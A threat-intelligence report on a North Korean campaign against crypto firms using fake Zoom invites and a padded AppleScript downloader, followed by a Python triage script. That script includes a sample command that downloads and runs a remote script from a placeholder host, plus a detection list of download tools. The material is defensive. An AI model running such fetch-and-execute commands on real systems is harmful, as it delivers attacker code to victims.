Fake Zoom meeting invites used as lure
The current attack campaigns against crypto and Web3 companies began in April and were previously documented by Huntabil.IT and Huntress, who attributed the attacks to a North Korean subgroup that dates back to at least 2017 and is tracked in the security industry under different names: TA444, BlueNoroff, Sapphire Sleet, Copernicium, Stardust Chollima, or CageyChameleon.
The victims received messages on Telegram from impersonated contacts they knew and trusted, who invited them to schedule a meeting via Calendly, an appointment scheduling service. They then received a fake email with an invitation to a Zoom meeting, along with instructions to run a “Zoom SDK update script.”
This script, named zoom_sdk_support.scpt, is written in AppleScript, a language developed by Apple for controlling macOS applications. This first-stage script is padded with 10,000 lines of whitespace to make the malicious code hard to read, but its purpose is to download a second-stage script from another attacker-controlled domain that contains the word zoom. This second-stage script downloads an HTML script that redirects the user to a real Zoom meeting link as a distraction from the attack chain executing in the background.
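The padding trick described above is cheap to triage: a script whose bulk is blank lines hiding a short body that shells out to a downloader is a strong indicator. The following is an added example (not code from the report or from the researchers it cites) that scores an AppleScript file on exactly that pattern; the sample script and the domain in it are constructed placeholders, not real indicators.

```python
"""Heuristic triage for AppleScript files that look like the padded first stage
described above: a huge run of blank lines hiding a short body that fetches a
second stage.  Added example; thresholds and sample are assumptions."""
import re

# Constructed sample mimicking the described first stage: many blank lines,
# then a shell-out that downloads and runs a second-stage script.
# The domain is a placeholder, not a real indicator.
SAMPLE_SCRIPT = ("\n" * 200) + (
    'do shell script "curl -fsSL https://zoom-sdk-example.invalid/update.scpt '
    '-o /tmp/u.scpt && osascript /tmp/u.scpt"\n'
)

# Commands an AppleScript lure typically needs to reach out and execute code.
NETWORK_PATTERNS = (r"\bcurl\b", r"\bwget\b", r"\bosascript\b", r"do shell script")


def analyze_applescript(text, min_blank_ratio=0.9, min_total_lines=100):
    """Return indicators for one script: padding ratio, download commands,
    whether it mentions zoom (the lure theme), and an overall verdict."""
    lines = text.split("\n")
    total = len(lines)
    blank = sum(1 for ln in lines if not ln.strip())
    ratio = blank / total if total else 0.0
    net_hits = [p for p in NETWORK_PATTERNS if re.search(p, text)]
    # "Padded" means the file is long but almost entirely whitespace.
    padded = total >= min_total_lines and ratio >= min_blank_ratio
    return {
        "total_lines": total,
        "blank_ratio": round(ratio, 3),
        "padded": padded,
        "network_commands": net_hits,
        "mentions_zoom": bool(re.search(r"zoom", text, re.IGNORECASE)),
        # Padding alone is odd; padding plus a downloader is the lure pattern.
        "suspicious": padded and bool(net_hits),
    }


if __name__ == "__main__":
    print(analyze_applescript(SAMPLE_SCRIPT))
```

Run it over files with a `.scpt` or `.applescript` extension pulled from mail or download directories; a benign script such as `tell application "Finder" to activate` scores as not suspicious.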